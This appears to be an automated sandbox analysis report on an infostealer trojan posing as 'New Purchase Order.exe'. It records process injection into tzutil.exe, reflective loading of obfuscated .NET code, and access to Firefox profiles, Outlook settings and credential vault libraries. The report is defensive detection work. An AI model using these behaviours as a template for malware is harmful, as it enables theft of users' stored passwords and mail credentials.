                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2AF0 NtWriteFile,LdrInitializeThunk,8_2_02CB2AF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_02CB2BE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_02CB2BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_02CB2BA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2B60 NtClose,LdrInitializeThunk,8_2_02CB2B60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_02CB2EE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_02CB2E80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2FE0 NtCreateFile,LdrInitializeThunk,8_2_02CB2FE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2FB0 NtResumeThread,LdrInitializeThunk,8_2_02CB2FB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2F30 NtCreateSection,LdrInitializeThunk,8_2_02CB2F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_02CB2CA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2C60 NtCreateKey,LdrInitializeThunk,8_2_02CB2C60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_02CB2C70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2DD0 NtDelayExecution,LdrInitializeThunk,8_2_02CB2DD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_02CB2DF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_02CB2D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_02CB2D30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB35C0 NtCreateMutant,LdrInitializeThunk,8_2_02CB35C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB39B0 NtGetContextThread,LdrInitializeThunk,8_2_02CB39B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2AB0 NtWaitForSingleObject,8_2_02CB2AB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2B80 NtQueryInformationFile,8_2_02CB2B80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2EA0 NtAdjustPrivilegesToken,8_2_02CB2EA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2E30 NtWriteVirtualMemory,8_2_02CB2E30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2F90 NtProtectVirtualMemory,8_2_02CB2F90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2FA0 NtQuerySection,8_2_02CB2FA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2F60 NtCreateProcessEx,8_2_02CB2F60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2CC0 NtQueryVirtualMemory,8_2_02CB2CC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2CF0 NtOpenProcess,8_2_02CB2CF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2C00 NtQueryInformationProcess,8_2_02CB2C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2DB0 NtEnumerateKey,8_2_02CB2DB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2D00 NtSetInformationFile,8_2_02CB2D00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB3090 NtSetValueKey,8_2_02CB3090
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB3010 NtOpenDirectoryObject,8_2_02CB3010
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB3D70 NtOpenThread,8_2_02CB3D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB3D10 NtOpenProcessToken,8_2_02CB3D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001E9480 NtCreateFile,8_2_001E9480
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001E95F0 NtReadFile,8_2_001E95F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001E96E0 NtDeleteFile,8_2_001E96E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001E9780 NtClose,8_2_001E9780
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001E98E0 NtAllocateVirtualMemory,8_2_001E98E0
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: String function: 018CF290 appears 105 times
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: String function: 01885130 appears 58 times
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: String function: 018BEA12 appears 86 times
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: String function: 0183B970 appears 280 times
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: String function: 01897E54 appears 107 times
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: String function: 02C6B970 appears 280 times
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: String function: 02CFF290 appears 105 times
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: String function: 02CB5130 appears 58 times
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: String function: 02CC7E54 appears 110 times
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: String function: 02CEEA12 appears 86 times
                Source: New Purchase Order.exe, 00000000.00000000.1351468701.0000000000504000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamelSvH.exe0 vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1398507379.00000000041D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1400933010.0000000007690000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1396835534.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1397890145.00000000029D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1401868692.0000000009550000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000003.00000002.1939972937.00000000013D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenametzutil.exej% vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000003.00000002.1940402066.000000000193D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000003.00000002.1939972937.00000000013B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenametzutil.exej% vs New Purchase Order.exe
                Source: New Purchase Order.exe Binary or memory string: OriginalFilenamelSvH.exe0 vs New Purchase Order.exe
                Source: New Purchase Order.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New Purchase Order.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, qJLvinebBxISnykLbR.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, qJLvinebBxISnykLbR.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, x9KwdfT83fQ1H75NjQ.cs Security API names: _0020.SetAccessControl
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, x9KwdfT83fQ1H75NjQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, x9KwdfT83fQ1H75NjQ.cs Security API names: _0020.AddAccessRule
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, x9KwdfT83fQ1H75NjQ.cs Security API names: _0020.SetAccessControl
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, x9KwdfT83fQ1H75NjQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, x9KwdfT83fQ1H75NjQ.cs Security API names: _0020.AddAccessRule
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, qJLvinebBxISnykLbR.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, x9KwdfT83fQ1H75NjQ.cs Security API names: _0020.SetAccessControl
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, x9KwdfT83fQ1H75NjQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, x9KwdfT83fQ1H75NjQ.cs Security API names: _0020.AddAccessRule
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@5/3
                Source: C:\Users\user\Desktop\New Purchase Order.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Purchase Order.exe.log
                Source: C:\Users\user\Desktop\New Purchase Order.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\tzutil.exe File created: C:\Users\user\AppData\Local\Temp\UQ63g7r-
                Source: New Purchase Order.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\New Purchase Order.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: tzutil.exe, 00000008.00000002.2611141533.000000000289A000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2611141533.000000000286A000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2611141533.0000000002848000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2131325423.000000000286A000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2611141533.0000000002876000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: New Purchase Order.exe ReversingLabs: Detection: 42%
                Source: unknown Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
                Source: C:\Users\user\Desktop\New Purchase Order.exe Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: dwrite.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\New Purchase Order.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: New Purchase Order.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: New Purchase Order.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: tzutil.pdbGCTL source: New Purchase Order.exe, 00000003.00000002.1939972937.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611092147.0000000000D17000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: snpURZzZKgO.exe, 00000005.00000002.2610064445.00000000002DE000.00000002.00000001.01000000.0000000C.sdmp, snpURZzZKgO.exe, 00000009.00000002.2610993422.00000000002DE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1940041347.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1946811053.0000000002A94000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000008.00000003.1940041347.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1946811053.0000000002A94000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: New Purchase Order.exe, 00000003.00000002.1939972937.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611092147.0000000000D17000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, x9KwdfT83fQ1H75NjQ.cs .Net Code: tZlGWcgwd3 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.41f1d80.0.raw.unpack, L2.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, x9KwdfT83fQ1H75NjQ.cs .Net Code: tZlGWcgwd3 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.7690000.4.raw.unpack, L2.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, x9KwdfT83fQ1H75NjQ.cs .Net Code: tZlGWcgwd3 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 0_2_04DB1D80 pushfd ; iretd 0_2_04DB1D81
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_004031D0 push eax; ret 3_2_004031D2
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_004169E7 push 0F6CFD2Bh; ret 3_2_00416A18
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_00423A0A push esp; ret 3_2_00423A0D
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_00419359 push ds; ret 3_2_0041935B
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_00418366 pushad ; iretd 3_2_00418367
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_00408325 push dword ptr [ebx+5Dh]; ret 3_2_0040830B
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_00417388 push edi; ret 3_2_0041738D
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_00419477 push edx; ret 3_2_00419485
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_00408403 push 00000074h; iretd 3_2_0040840B
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_00417411 push eax; ret 3_2_00417414
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_00411D6F push ds; iretd 3_2_00411DBD
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_00411D7B push ds; iretd 3_2_00411DBD
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_0041758A push ebp; ret 3_2_004175A6
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_0040D66A push ecx; iretd 3_2_0040D6D9
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_00414E05 push cs; retf 3_2_00414E14
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_0040860D push cs; retf 3_2_0040860E
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_00413E93 pushfd ; ret 3_2_00413F00
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_00413EBC pushfd ; ret 3_2_00413F00
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 3_2_018409AD push ecx; mov dword ptr [esp], ecx 3_2_018409B6
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_02C709AD push ecx; mov dword ptr [esp], ecx 8_2_02C709B6
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_02C41366 push eax; iretd 8_2_02C41369
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_001D6186 push ds; ret 8_2_001D6188
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_001D41B5 push edi; ret 8_2_001D41BA
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_001D423E push eax; ret 8_2_001D4241
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_001D62A4 push edx; ret 8_2_001D62B2
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_001D43B7 push ebp; ret 8_2_001D43D3
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_001D2817 push ebp; iretd 8_2_001D2818
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_001E0834 push esp; ret 8_2_001E083A
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_001E0840 push esp; ret 8_2_001E083A
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_001E0840 push ebp; retn 2F48h 8_2_001E0927
                Source: New Purchase Order.exe Static PE information: section name: .text entropy: 7.774994729207274
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, BQb46HyRu1p84y2ymB.csHigh entropy of concatenated method names: 'o74DJ3Oucs', 'dEsDugePmc', 'nTlDPQIMwg', 'LllDStDxsi', 'M6UD8HxNwa', 'ySID36aQUO', 'QKpDUhWPGt', 'SQxDZl7Wgo', 'bmBDMF5E2n', 'pisDsIJANP'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, EQ36o52QR78S2TY0Nr.csHigh entropy of concatenated method names: 'QNHLVMqr7H', 'r45LN6U3cX', 'aSyLWqD862', 'D40LwLNcqI', 'wP3LdUlOSt', 'P4qLRbduj5', 'IijL4l4XwX', 'qxZL2HOVlc', 'MvELAGN84C', 'pBeLyZK92l'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, sWMmMCzjFcaHdo9GIV.csHigh entropy of concatenated method names: 'XPanRIjpfE', 'I4tn23yUnq', 'tbPnAyUmNq', 'B9cnigFeky', 'l2vn804T4a', 'hU0nUsvAac', 'cD1nZJ0pPV', 'ifHnQSo4FM', 'pDdnVuVjo3', 'Rk5nNIiQYh'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, DkYhVYHL5JxUdqiDtq.csHigh entropy of concatenated method names: 'fnJCw4dSTB', 'wX7CRLSb3E', 'Gd2C2sh7Dy', 'TTxCAIM89D', 'sg0CDhp3UN', 'HQMCIXvZ2D', 'MHOC7UhBgi', 'D5oCx5e8QV', 'cqBCvMrINy', 'Vp0CnJsX9q'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, zdnbOrNNHt6v851ld1o.csHigh entropy of concatenated method names: 'wS1nKGV2CW', 'xM3nzRNkec', 'L1nbowVAMB', 'h2pbmKo6uE', 'ia4baeGS7c', 'xQMbFwEaso', 'iSabGjOYBP', 'Q9pb1WpaZy', 'nFfb9YhVkx', 'JZQbq3Dl0T'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, Mw4V8KhpS2G0JUgxuV.csHigh entropy of concatenated method names: 'ToString', 'B4vIjhU2Tw', 'M1lI8gGtPA', 'hGFI3vGNvE', 'kuKIUc1EQc', 'T7sIZSPYda', 'c9mIM4WuYW', 'MTPIsi8ImO', 'gogIfnkWQH', 'SCbIOcLTgQ'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, UnLOGLACcMYAxbpnNq.csHigh entropy of concatenated method names: 'QbBvip4nnG', 'upSv848CRA', 'PYhv3HgH7L', 'YgUvULcaqx', 'JDCvZZYllk', 'GJIvMpqmw1', 'QpqvsTFPhr', 'ImWvfZBqAa', 'IOQvOj6e8Y', 'sIbvJrBTOi'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, ID9eoKYmHSYY79KjaI.csHigh entropy of concatenated method names: 'G43760uKNA', 'tWj7KLqmpo', 'jx3xoMmZVa', 'IaUxmSHhIM', 'R8W7jmkQrG', 'NXK7uWFCiK', 'k6g7lxXho5', 'gBa7PSq3rx', 'XtW7SvR86c', 'BEC7kKrMVK'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, btCpwG6WZyE3ZX17TX.csHigh entropy of concatenated method names: 'qnetdWQFE6', 'uO2t42KETm', 'K6lC3Mw4mK', 'oipCUhY45O', 'uVHCZucxXY', 'y3HCM55vIb', 'sbyCsAR4eu', 'prCCfokx9x', 'Vq8COyiAKx', 'AISCJCYJlK'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, r0yIrBonvq7nvwCEQV.csHigh entropy of concatenated method names: 'WQ7mL2uN5L', 'Wt9mgjG6Mq', 'SZUmBiIY8h', 'vidmeeLXWi', 'JkwmDwhYT7', 'kwumI8H51o', 'jDM30GIHFDfChaMpE0', 'W4kwpOQNpXSEW6pvqF', 'uXWmmX7DRW', 'uVHmFeAsYy'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, z8j2I5NvfYZF22kkA5q.csHigh entropy of concatenated method names: 't91bKnroPG', 'QwAbz02UR6', 'QIpcoIVGRL', 'Oe2alnZ3xiJk6cu3LDT', 'rJ5puAZ4W04I3nieLuy', 'tlCONxZMhGtpI8hgTmR', 'aBSgLsZ04jx4VCWE0dM'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, qJLvinebBxISnykLbR.csHigh entropy of concatenated method names: 'BnQqP0O3SH', 'lVSqS8k7As', 'Oheqkju39M', 'sWVqYiEYvM', 'tVHqpFjcZX', 'O1iqEYwjRr', 'GqjqTvg0Dr', 'V8Zq6gfsXr', 'mbkqHENsfU', 'PVHqKOhR6y'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, HvOXG3Ecb9WHxnMt83.csHigh entropy of concatenated method names: 'zBrh2fCfc6', 'ujghAvTW0n', 'IBkhi64Awi', 'XTfh8dga4l', 'LcahUqpZwO', 'tYfhZH8ueu', 'Do2hsI0BOn', 'VeyhfCgpo3', 'Mn2hJ6jHs6', 'NOJhjiEQEV'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, ARFY7aJ4w95USnOhEH.csHigh entropy of concatenated method names: 'Dispose', 'AElmHo5e3l', 'H0sa888WQb', 'OxbcpfcuJU', 'SdhmKLtol7', 'uVwmzq2cT7', 'ProcessDialogKey', 'AyZaoO8FdJ', 'ce0am4nd2a', 'zWWaaDJWZ1'
